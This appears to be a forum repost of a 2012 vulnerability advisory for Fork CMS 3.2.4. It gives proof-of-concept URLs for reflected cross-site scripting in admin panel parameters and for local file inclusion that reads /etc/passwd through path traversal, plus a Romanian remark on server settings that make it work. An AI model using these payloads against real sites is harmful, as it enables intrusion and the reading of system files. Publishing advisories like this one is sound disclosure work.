backdoor Posted February 13, 2012 Report Posted February 13, 2012 Fork CMS version 3.2.4 suffers from cross site scripting and local file inclusion vulnerabilities.########################################################################################################################## # Exploit Title: Fork CMS v.3.2.4 - Multiple Vulnerabilities # Script Page : http://www.fork-cms.com # Date: 11-02-2012# Author : RandomStorm - http://www.randomstorm.com# Avram Marius Gabriel (d3v1l)# Tested on: Windows XP & Vista########################################################################################################################## # Reflected Cross-Site Scripting (XSS) on Admin Panel# POC: # http://site.com/blog/settings?token=true&report=</script><script>alert(1)</script> # http://site.com/users/index?token=true&error=</script><script>alert(1)</script> ########################################################################################################################### # Local File Inclusion ( LFI )# POC: # http://site.com/frontend/js.php?module=../../../../../../../../../../../../../../etc/passwd%00&file=frontend.js&language=en########################################################################################################################### About: Fork CMS is dedicated to creating a user friendly environment to build,monitor and update your website.###########################################################################################################################Sursa : Fork CMS 3.2.4 Cross Site Scripting / Local File InclusionMerge bine daca open_base_dir nu e setat cum trebuie si php ruleaza cu mod_php (adica cu user apache/www) . Quote
